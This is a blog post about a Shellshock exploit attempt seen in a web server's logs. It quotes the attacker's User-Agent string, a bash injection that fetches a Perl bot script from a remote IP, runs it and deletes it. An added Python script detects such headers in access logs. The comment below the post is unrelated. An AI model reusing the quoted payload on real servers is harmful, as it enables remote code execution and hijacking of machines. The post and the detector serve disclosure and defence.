My First Real Shellshock

Apart from a harmless backping immediately after the Shellshock vulnerability became known, this is the first time that I have noticed an actual exploit. (There may have been others that went unnoticed, which might have just used some HTTP headers.) This one caused a 404 by accessing “/phppath/cgi_wrapper”, which we don’t have on our servers. So here’s the User-Agent string – have fun reading the Perl script that it’s trying to download and execute:

() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESSX";system("wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl");'
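
A log check for requests of this kind, added here as an example and not part of the original post: it scans combined-format access log lines for a bash function definition (`() {`) at the start of the Referer or User-Agent value and records whether the targeted path returned 404, as it did above. The sample log lines, addresses and the `/cgi-bin/status` path are constructed.

```python
import re

# Combined log format: ip - user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped quotes (Apache logs " as \").
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)

# Shellshock marker: a header value that begins with a function definition "() {"
SHELLSHOCK_RE = re.compile(r'^\s*\(\s*\)\s*\{')

# Constructed sample input (documentation address ranges, harmless commands)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2014:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Oct/2014:10:00:05 +0000] "GET /phppath/cgi_wrapper HTTP/1.1" 404 209 "-" '
    '"() { :;};/bin/echo \\"constructed sample\\""',
    '203.0.113.9 - - [01/Oct/2014:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 77 '
    '"() { :; }; /bin/true" "curl/7.38"',
]


def find_shellshock(lines):
    """Return one record per log line whose Referer or User-Agent starts with '() {'."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined format; skipped rather than guessed at
        ip, request, status, referer, agent = m.groups()
        for field, value in (("referer", referer), ("agent", agent)):
            if SHELLSHOCK_RE.match(value):
                parts = request.split()
                hits.append({
                    "ip": ip,
                    "path": parts[1] if len(parts) > 1 else "",
                    "status": int(status),
                    "field": field,
                    # 404: the targeted CGI path does not exist on this server.
                    # Any other status means the path was served and needs a closer look.
                    "target_missing": int(status) == 404,
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```
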

2 Responses to My First Real Shellshock

  1. Hunter Meriwether says:

    I just found your post on “Possible reasons for linker errors”, after beating my head for weeks trying to understand a cryptic LNK2019 error message. You’ve opened my eyes to “undname” and I’m forever in your debt. Thanks!
